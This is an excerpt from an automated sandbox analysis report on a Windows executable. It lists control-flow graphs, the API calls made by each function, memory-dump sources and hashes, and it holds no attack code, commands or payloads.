    control_flow_graph 1014 44be98-44beea call 44d788 call 44c070 GetVersionExA 1019 44beec-44bef2 1014->1019 1020 44bef8-44bf12 GetModuleHandleA 1014->1020 1019->1020 1021 44bf14-44bf1f 1020->1021 1022 44bf33-44bf36 1020->1022 1021->1022 1023 44bf21-44bf2a 1021->1023 1024 44bf5f-44bf69 call 44e07d 1022->1024 1025 44bf2c-44bf31 1023->1025 1026 44bf4b-44bf4f 1023->1026 1033 44bf73-44bf7a call 44c499 1024->1033 1034 44bf6b-44bf72 call 44be74 1024->1034 1025->1022 1028 44bf38-44bf3f 1025->1028 1026->1022 1029 44bf51-44bf53 1026->1029 1028->1022 1031 44bf41-44bf49 1028->1031 1032 44bf59-44bf5c 1029->1032 1031->1032 1032->1024 1039 44bf84-44bf93 call 4502e3 call 4505a6 1033->1039 1040 44bf7c-44bf83 call 44be74 1033->1040 1034->1033 1047 44bf95-44bf9c call 44be4f 1039->1047 1048 44bf9d-44bfb8 call 4536f2 call 453588 call 4534f2 1039->1048 1040->1039 1047->1048 1057 44bfc2-44bfc9 call 4532bf 1048->1057 1058 44bfba-44bfc1 call 44be4f 1048->1058 1063 44bfd3-44bfe0 call 44ae57 1057->1063 1064 44bfcb-44bfd2 call 44be4f 1057->1064 1058->1057 1069 44bfe2-44bfe8 call 44be4f 1063->1069 1070 44bfe9-44c002 GetStartupInfoW call 453279 1063->1070 1064->1063 1069->1070 1075 44c004-44c008 1070->1075 1076 44c00a-44c00c 1070->1076 1077 44c00d-44c023 GetModuleHandleA call 401852 1075->1077 1076->1077 1080 44c025-44c026 call 44af84 1077->1080 1081 44c02b-44c06b call 44afa6 call 44d7c3 1077->1081 1080->1081
    APIs
    • GetVersionExA.KERNEL32(?,0045B1B8,00000060), ref: 0044BEB8
    • GetModuleHandleA.KERNEL32(00000000,?,0045B1B8,00000060), ref: 0044BF0B
    • _fast_error_exit.LIBCMT ref: 0044BF6D
    • _fast_error_exit.LIBCMT ref: 0044BF7E
    • GetStartupInfoW.KERNEL32(?,?,0045B1B8,00000060), ref: 0044BFF0
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0044C013
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: HandleModule_fast_error_exit$InfoStartupVersion
    • String ID:
    • API String ID: 3067550359-0
    • Opcode ID: b4df797f1f5522ee9614dc9aa1c6271b439055e8099f76291fd588c5d9a09bbc
    • Instruction ID: 4397700529556a9b6abbbd61bb681adda0ddf508862c8991d2dc27ae9542f7d9
    • Opcode Fuzzy Hash: b4df797f1f5522ee9614dc9aa1c6271b439055e8099f76291fd588c5d9a09bbc
    • Instruction Fuzzy Hash: F941B670D01310DAEB21AFA69C056AE36A0EF44718F24443FF808DA292DB7CC945DBDD
    Function 00455359 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 247fileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1088 455359-455372 1089 455374-45537b 1088->1089 1090 45537d-455384 1088->1090 1091 455388-45538f 1089->1091 1090->1091 1092 455391-455394 1091->1092 1093 4553a2-4553ab 1091->1093 1096 455396-45539c 1092->1096 1097 45539e 1092->1097 1094 4553c5 1093->1094 1095 4553ad-4553ae 1093->1095 1100 4553cc-4553cf 1094->1100 1098 4553b0-4553b1 1095->1098 1099 4553bc-4553c3 1095->1099 1096->1093 1096->1097 1097->1093 1101 4553e0-4553f5 call 44d915 call 44d91e 1098->1101 1102 4553b3-4553ba 1098->1102 1099->1100 1103 455411 1100->1103 1104 4553d1-4553d4 1100->1104 1130 4555f1-4555f4 1101->1130 1102->1100 1105 455414-45542a 1103->1105 1106 4553d6-4553d9 1104->1106 1107 455408-45540f 1104->1107 1109 45542c 1105->1109 1110 45545b-455460 1105->1110 1111 4553ff-455406 1106->1111 1112 4553db-4553de 1106->1112 1107->1105 1114 455456-455459 1109->1114 1115 45542e-455430 1109->1115 1117 455490 1110->1117 1118 455462-455467 1110->1118 1111->1105 1112->1101 1116 4553fa-4553fd 1112->1116 1121 455497-4554a1 1114->1121 1115->1114 1120 455432-455434 1115->1120 1116->1105 1117->1121 1122 455487-45548e 1118->1122 1123 455469-45546b 1118->1123 1125 455436-45543b 1120->1125 1126 45544d-455454 1120->1126 1127 4554b5-4554b7 1121->1127 1128 4554a3-4554b0 1121->1128 1122->1121 1123->1117 1129 45546d-455482 call 44d915 call 44d91e 1123->1129 1125->1122 1132 45543d-455442 1125->1132 1126->1121 1134 4554d0-4554d3 1127->1134 1135 4554b9-4554ca 1127->1135 1128->1127 1133 4554b2-4554b4 1128->1133 1148 4555f0 1129->1148 1132->1129 1137 455444-45544b 1132->1137 1133->1127 1139 4554d5 1134->1139 1140 4554d7-4554d9 1134->1140 1135->1134 1138 4554cc 1135->1138 1137->1121 1138->1134 1139->1140 1142 4554e3-4554e5 1140->1142 1143 4554db-4554e1 1140->1143 1144 4554ed-4554f9 call 4509a2 1142->1144 1145 4554e7 1142->1145 1143->1144 1150 455515-455540 CreateFileW 1144->1150 1151 4554fb-45550b call 44d915 call 44d91e 1144->1151 1145->1144 1148->1130 1153 455554-455561 GetLastError call 44d927 1150->1153 1154 455542-45554b GetFileType 1150->1154 1163 45550e-455510 1151->1163 1153->1163 1156 455563-455566 1154->1156 1157 45554d-45554e CloseHandle 1154->1157 1160 45556e-455571 1156->1160 1161 455568-45556c 1156->1161 1157->1153 1164 455577-4555ab call 4507a4 1160->1164 1165 455573 1160->1165 1161->1164 1163->1148 1169 4555ad-4555af 1164->1169 1170 4555d9-4555dd 1164->1170 1165->1164 1169->1170 1173 4555b1-4555b5 1169->1173 1171 4555df-4555e3 1170->1171 1172 4555ee 1170->1172 1171->1172 1174 4555e5-4555eb 1171->1174 1172->1148 1173->1170 1175 4555b7-4555ca call 44f7f5 1173->1175 1174->1172 1178 4555f5-45560a call 44ff81 1175->1178 1179 4555cc-4555d7 call 44d91e 1175->1179 1185 455623-455633 call 44f7f5 1178->1185 1186 45560c-455611 1178->1186 1179->1170 1184 455635-45563b call 44fd57 1179->1184 1185->1170 1185->1184 1186->1185 1188 455613-455621 call 45705f 1186->1188 1188->1184 1188->1185
    APIs
    • CreateFileW.KERNEL32(80000000,80000000,00000000,0000000C,00000001,00000080,00000000,00000001,00000000,00000000), ref: 00455536
    • GetFileType.KERNEL32(00000000), ref: 00455543
    • CloseHandle.KERNEL32(00000000), ref: 0045554E
    • GetLastError.KERNEL32 ref: 00455554
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: File$CloseCreateErrorHandleLastType
    • String ID: H
    • API String ID: 1809617866-2852464175
    • Opcode ID: 5ce06f682877ec76a1bbaac30100a30f596ab4e7cb3384c2f439e5053bbd4e01
    • Instruction ID: 3dea303bc14a8af4d4d0b503b19b291cd52b6a6c41b7bea232f97b06bbe31069
    • Opcode Fuzzy Hash: 5ce06f682877ec76a1bbaac30100a30f596ab4e7cb3384c2f439e5053bbd4e01
    • Instruction Fuzzy Hash: 02810671804A49AAEF218B94C8653BF7B70AF0231BF24415BEC51A72D3D77C498DCB5A
    Function 00455BA1 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 247fileCOMMON
    Download Yara Rule
    APIs
    • CreateFileA.KERNEL32(80000000,80000000,0046270C,0000000C,00000001,00000080,00000000,?,00000000,00000000), ref: 00455D7E
    • GetFileType.KERNEL32(00000000), ref: 00455D8B
    • CloseHandle.KERNEL32(00000000), ref: 00455D96
    • GetLastError.KERNEL32 ref: 00455D9C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: File$CloseCreateErrorHandleLastType
    • String ID: H
    • API String ID: 1809617866-2852464175
    • Opcode ID: aefb27ce640e5ec0de87e9abf81864acf92e705f4e30c285089214354cd5a602
    • Instruction ID: 18fb0dc3de688eab9ec8008dfc50e8359a27c51e16112c87510f03193277da9b
    • Opcode Fuzzy Hash: aefb27ce640e5ec0de87e9abf81864acf92e705f4e30c285089214354cd5a602
    • Instruction Fuzzy Hash: 5D812471804B499AEF228B98C8693BE7B709F0231AF24415BEC51A72D3C77D4A4DC75A
    Function 0044ADFD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleHandleA.KERNEL32(mscoree.dll,0044AF6B,?,0045B120,00000008,0044AFA2,?,00000001,00000000,00454705,00000003), ref: 0044AE02
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044AE12
    • ExitProcess.KERNEL32 ref: 0044AE26
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressExitHandleModuleProcProcess
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 75539706-1276376045
    • Opcode ID: b17e66e1c60e703c919b077964af005c51aeddcd4bd0fbb943e394ff849fcc91
    • Instruction ID: 53a9ad44f3a9e6b916fa28b3adb372b4395d43277910e5f1d752cbfe1555cb17
    • Opcode Fuzzy Hash: b17e66e1c60e703c919b077964af005c51aeddcd4bd0fbb943e394ff849fcc91
    • Instruction Fuzzy Hash: CBD0C930280701FBEF405B719C0AA2B7A68FE44B47F108C75B819D8263CB78CC10DA2E
    Function 0041629F Relevance: 7.5, APIs: 5, Instructions: 32serviceCOMMON
    Download Yara Rule
    APIs
    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,00479E08,00479BD8,0040119C,00479BFC,00000000), ref: 004162B3
    • LockServiceDatabase.ADVAPI32(00000000), ref: 004162C0
    • UnlockServiceDatabase.ADVAPI32(00000000), ref: 004162CB
    • CloseServiceHandle.ADVAPI32(00000000), ref: 004162E3
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Service$Database$CloseHandleLockManagerOpenUnlock
    • String ID:
    • API String ID: 3647510317-0
    • Opcode ID: 377cb6a1556d2c0b34a69d2726eb7eac8501c5ce8fbfca6eb216596d4b31a9b1
    • Instruction ID: 43232d2ce80c1354198d9eaea2583da01791e04a0cef509c89e940ee515f7624
    • Opcode Fuzzy Hash: 377cb6a1556d2c0b34a69d2726eb7eac8501c5ce8fbfca6eb216596d4b31a9b1
    • Instruction Fuzzy Hash: 49E06D769422209BCB202BB0ACCC9DF3B59A70621371618B2F54292291C729CCC6A66C
    Function 00401904 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryA.KERNEL32(uxtheme.dll,00401884,74DF0A60,00000000), ref: 0040190F
    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00401921
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: IsThemeActive$uxtheme.dll
    • API String ID: 2574300362-3542929980
    • Opcode ID: ed6c78d227b817cdbed870c23739e6fb2758cfda5514cb43d7da1eea0dd35e15
    • Instruction ID: eea2efce3837e0203db1cb3c4d5c02faa46c89d2bfa5e81eac7c0935e43c98e4
    • Opcode Fuzzy Hash: ed6c78d227b817cdbed870c23739e6fb2758cfda5514cb43d7da1eea0dd35e15
    • Instruction Fuzzy Hash: 4ED0C9B1540702EECB205F61C8897127AE8BB14703F20987BF88AE26A1E778D644CA1C
    Function 0044FF81 Relevance: 6.2, APIs: 4, Instructions: 168fileCOMMON
    Download Yara Rule
    APIs
    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 0044FFFB
    • GetLastError.KERNEL32 ref: 00450005
    • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 004500CE
    • GetLastError.KERNEL32 ref: 004500D8
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ErrorFileLastRead
    • String ID:
    • API String ID: 1948546556-0
    • Opcode ID: 106ceec12e824d1f921699dafc9b08d4ae01bbaa5a8b869dbfd030dde0547a2e
    • Instruction ID: 6471931987010d01bcf4aa760061fc4daebf1b9b9bd924f830c326e67dc1cfed
    • Opcode Fuzzy Hash: 106ceec12e824d1f921699dafc9b08d4ae01bbaa5a8b869dbfd030dde0547a2e
    • Instruction Fuzzy Hash: DE61B5389047859FDB218F58C884BAE7BF0AF02316F14419BEC658B393D779D949CB1A
    Function 00442D0D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: _strcat
    • String ID: AU3!$EA05
    • API String ID: 1765576173-125543416
    • Opcode ID: b684cd3a868db2b672720c42e2ba8a09bf63860d4299db03b5ba3f85f8b4252d
    • Instruction ID: 29d5f5a1b1809eb385cd818f5a50e58fa9f1bd2989d91b3669fe8a792949b4ba
    • Opcode Fuzzy Hash: b684cd3a868db2b672720c42e2ba8a09bf63860d4299db03b5ba3f85f8b4252d
    • Instruction Fuzzy Hash: 70218F71D402086AFB11DAA8CD46FEE3BA9AF44308F6408AFF141E7183E5F49244876A
    Function 0044FEA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: __getbuf
    • String ID: o-D$pYF
    • API String ID: 554500569-2041862546
    • Opcode ID: 43c3c69ad03a229e1e8eb7df82381eef4f8a4a41fcf0637eb458d4d674484f8b
    • Instruction ID: 45ab4429e61f8382d5639e8b3e42171f035d9681ef4c197fd688d929c02a0895
    • Opcode Fuzzy Hash: 43c3c69ad03a229e1e8eb7df82381eef4f8a4a41fcf0637eb458d4d674484f8b
    • Instruction Fuzzy Hash: FD219331414B018FE7348E29C450763B7E1AF56374B248A2FE4F6877D2D739A84E8B48
    Function 0044FAF0 Relevance: 4.6, APIs: 3, Instructions: 146fileCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0044FBE0
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: FileWrite
    • String ID:
    • API String ID: 3934441357-0
    • Opcode ID: 2232f439ec6bcbb526f72077e2e8a9aff7e1540724577345c53341a595c8efdf
    • Instruction ID: 70d429ee7121439abd4bc97c56a079324356a00733651e9dd73cd6a5f99de41e
    • Opcode Fuzzy Hash: 2232f439ec6bcbb526f72077e2e8a9aff7e1540724577345c53341a595c8efdf
    • Instruction Fuzzy Hash: E5514E71900248CFEF25DFA8C984AADBBB8FF0A305F24056EE8559B252D7349909CB19
    Function 00414E97 Relevance: 4.6, APIs: 3, Instructions: 75COMMON
    Download Yara Rule
    APIs
    • SHGetMalloc.SHELL32(00000000), ref: 00414EB8
    • SHGetDesktopFolder.SHELL32(00479BFC), ref: 00414ED7
    • SHGetPathFromIDListW.SHELL32(00479BFC,?), ref: 00414F0D
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: DesktopFolderFromListMallocPath
    • String ID:
    • API String ID: 2281215042-0
    • Opcode ID: 0cae5ed027558df8873fee4d4261fe6c77dde843b4c5736da9820a2cc43bf41f
    • Instruction ID: 420e6610a152b6402536c0acf94c904dc319534d543c5730a20390f59e048e41
    • Opcode Fuzzy Hash: 0cae5ed027558df8873fee4d4261fe6c77dde843b4c5736da9820a2cc43bf41f
    • Instruction Fuzzy Hash: 44218C76900219ABDB10DFA0D888EDEB7B9AF48710F10409AF9059B290DB35EE45CB58
    Function 0040FEE1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
    Download Yara Rule
    APIs
    • 7523D0D0.COMDLG32(?,?,?,00000000), ref: 0040FF48
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: 7523
    • String ID: L
    • API String ID: 1018694936-2909332022
    • Opcode ID: a451f9766535fbff533a0e79421233fc477a3f8618325c29e60940b41480bccb
    • Instruction ID: 330d7db1dff8d0dace56692776e634023b6589962e6fd7eaa97cd0302946ad61
    • Opcode Fuzzy Hash: a451f9766535fbff533a0e79421233fc477a3f8618325c29e60940b41480bccb
    • Instruction Fuzzy Hash: 351154B1801218AADB11DF95DC45FDF7BBCAF05308F00806AF618A6181D7BC5A8DCBA9
    Function 00442C1C Relevance: 3.1, APIs: 2, Instructions: 85COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 004168A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0045C6D0,?,?,?,00442C32,00000000,0045C6D0), ref: 004168CE
      • Part of subcall function 004168A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00442C32,00000000,0045C6D0), ref: 004168F0
    • _strcat.LIBCMT ref: 00442C49
    • _strcat.LIBCMT ref: 00442C56
      • Part of subcall function 00442A91: _strlen.LIBCMT ref: 00442A99
      • Part of subcall function 00442D0D: _strcat.LIBCMT ref: 00442D41
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: _strcat$ByteCharMultiWide$_strlen
    • String ID:
    • API String ID: 1312754939-0
    • Opcode ID: bedb7ca2922ce659903e2fe4b674b38f4b77e69a7d06eca3cc212a1eff07f0cd
    • Instruction ID: b0cc53737743a3ac0a727fc92c25a37191f4a65ad63c267f3757994ee01627ef
    • Opcode Fuzzy Hash: bedb7ca2922ce659903e2fe4b674b38f4b77e69a7d06eca3cc212a1eff07f0cd
    • Instruction Fuzzy Hash: 96219DB29105242FFB20BB768C82B9EB79CFF01318F50896FF465D2182EB7CD9104699
    Function 0044F7F5 Relevance: 3.0, APIs: 2, Instructions: 43COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,?,?,?,0044F8C0,?,00000000,0044EFF8,0045B9B8,0000000C,0044CCA9,00000000,00000000,00000002), ref: 0044F822
    • GetLastError.KERNEL32 ref: 0044F82F
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: ef301333862fd523fcfef0701836ec2e687ab67301aea6ab59806455b9707fa4
    • Instruction ID: f4beb2f81c7b533093f19090f57eb703413f6fe32cdcc2261b4f7d7860460413
    • Opcode Fuzzy Hash: ef301333862fd523fcfef0701836ec2e687ab67301aea6ab59806455b9707fa4
